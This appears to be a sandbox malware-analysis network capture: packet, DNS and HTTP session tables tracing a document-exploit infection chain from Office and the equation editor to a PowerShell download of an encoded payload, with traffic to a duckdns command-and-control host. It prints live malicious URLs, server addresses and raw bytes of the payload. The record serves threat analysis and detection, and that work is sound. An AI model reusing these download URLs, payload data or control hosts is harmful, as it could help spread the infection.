Aug 28, 2024 06:54:16.809775114 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809784889 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809796095 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809806108 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809808016 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809825897 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809870958 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809881926 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809891939 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809901953 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809916019 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809920073 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809962988 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809971094 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809974909 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810007095 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810046911 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810062885 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810075045 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810086966 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810098886 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810105085 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810117006 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810152054 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810163021 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810173035 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810183048 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810192108 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810197115 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810220957 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810244083 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810256004 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810278893 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810303926 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810314894 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810324907 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810338020 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810338974 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810400009 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810410023 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810420990 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810432911 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810441971 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810484886 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810497046 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810507059 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810527086 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810549021 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810565948 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810576916 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810590029 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810605049 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810621023 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810661077 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810672998 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810684919 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810722113 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810766935 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810777903 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810790062 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810811996 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810853958 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810866117 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810877085 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810889959 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.810898066 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.810920000 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811044931 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811055899 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811068058 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811079979 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811091900 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811104059 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811110020 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811115026 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811120987 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811134100 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811146975 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811150074 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811166048 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811186075 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811199903 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811213970 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811223984 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811237097 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811244965 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811258078 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811306953 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811319113 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811330080 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811341047 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.811352015 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811362028 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.811868906 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:17.038546085 CEST | 80 | 49175 | 178.237.33.50 | 192.168.2.22
Aug 28, 2024 06:54:17.038656950 CEST | 49175 | 80 | 192.168.2.22 | 178.237.33.50
Aug 28, 2024 06:54:22.472073078 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.476950884 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.476979971 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.477049112 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.481879950 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.481889009 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.481897116 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.481952906 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.481977940 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.481990099 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.482057095 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.487409115 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487457037 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487476110 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.487548113 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487679958 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487688065 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487714052 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487754107 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.487799883 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.492377996 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.492386103 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.492419004 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.496222019 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:22.501310110 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:22.502746105 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:30.920988083 CEST | 14645 | 49173 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:30.922982931 CEST | 49173 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:30.929721117 CEST | 14645 | 49173 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:55:01.803839922 CEST | 14645 | 49173 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:55:01.805473089 CEST | 49173 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:55:01.810344934 CEST | 14645 | 49173 | 192.210.214.9 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 06:53:49.345912933 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:49.356564999 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:51.752123117 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:51.762725115 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:53.611028910 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:53.621066093 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:53.623045921 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:53.633049011 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:57.797185898 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:57.807403088 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:57.808645964 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:57.815525055 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:59.382438898 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:59.389516115 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:53:59.391988993 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:53:59.399003029 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:54:09.844517946 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:54:09.853941917 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:54:13.739921093 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:54:13.837308884 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Aug 28, 2024 06:54:15.412986994 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Aug 28, 2024 06:54:15.422159910 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 06:53:49.345912933 CEST | 192.168.2.22 | 8.8.8.8 | 0x28f7 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:51.752123117 CEST | 192.168.2.22 | 8.8.8.8 | 0xa5e0 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:53.611028910 CEST | 192.168.2.22 | 8.8.8.8 | 0xd0f3 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:53.623045921 CEST | 192.168.2.22 | 8.8.8.8 | 0x797a | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:57.797185898 CEST | 192.168.2.22 | 8.8.8.8 | 0xc083 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:57.808645964 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:59.382438898 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:59.391988993 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:09.844517946 CEST | 192.168.2.22 | 8.8.8.8 | 0x2ed6 | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:13.739921093 CEST | 192.168.2.22 | 8.8.8.8 | 0x3dc | Standard query (0) | 2024remcmon.duckdns.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:15.412986994 CEST | 192.168.2.22 | 8.8.8.8 | 0x1995 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 06:53:49.356564999 CEST | 8.8.8.8 | 192.168.2.22 | 0x28f7 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:51.762725115 CEST | 8.8.8.8 | 192.168.2.22 | 0xa5e0 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:53.621066093 CEST | 8.8.8.8 | 192.168.2.22 | 0xd0f3 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:53.633049011 CEST | 8.8.8.8 | 192.168.2.22 | 0x797a | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:57.807403088 CEST | 8.8.8.8 | 192.168.2.22 | 0xc083 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:57.815525055 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:59.389516115 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:53:59.399003029 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:09.853941917 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ed6 | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:13.837308884 CEST | 8.8.8.8 | 192.168.2.22 | 0x3dc | No error (0) | 2024remcmon.duckdns.org | | 192.210.214.9 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:54:15.422159910 CEST | 8.8.8.8 | 192.168.2.22 | 0x1995 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• zhort.de
• ia803104.us.archive.org
• 107.172.31.21
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 107.172.31.21 | 80 | 3368 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:53:50.363102913 CEST | 477 | OUT | GET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.172.31.21
Connection: Keep-Alive
Aug 28, 2024 06:53:50.956017017 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:53:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 27 Aug 2024 14:45:54 GMT
ETag: "14696-620ab4c79b162"
Accept-Ranges: bytes
Content-Length: 83606
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 107.172.31.21 | 80 | 3672 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:54:02.395867109 CEST | 290 | OUT | HEAD /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 107.172.31.21
Content-Length: 0
Connection: Keep-Alive
Aug 28, 2024 06:54:02.971862078 CEST | 322 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:54:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 27 Aug 2024 14:45:54 GMT
ETag: "14696-620ab4c79b162"
Accept-Ranges: bytes
Content-Length: 83606
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49170 | 107.172.31.21 | 80 | 3972 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:54:03.556162119 CEST | 347 | OUT | GET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.172.31.21
Connection: Keep-Alive
Aug 28, 2024 06:54:05.164135933 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:54:04 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 27 Aug 2024 14:35:42 GMT
ETag: "2ccb2-620ab27fcc14f"
Accept-Ranges: bytes
Content-Length: 183474
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49172 | 107.172.31.21 | 80 | 2772 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:54:12.403237104 CEST | 81 | OUT | GET /xampp/nbc/EVRR.txt HTTP/1.1
Host: 107.172.31.21
Connection: Keep-Alive
Aug 28, 2024 06:54:13.525708914 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:54:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 27 Aug 2024 14:33:15 GMT
ETag: "a1000-620ab1f342ee9"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                                      Data Ascii: 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
                                                                      Aug 28, 2024 06:54:13.525742054 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                                      Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                                                                      Aug 28, 2024 06:54:13.525755882 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                                      Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                                                                      Aug 28, 2024 06:54:13.525888920 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                                      Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                                                                      Aug 28, 2024 06:54:13.525899887 CEST1236INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                                                                      Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
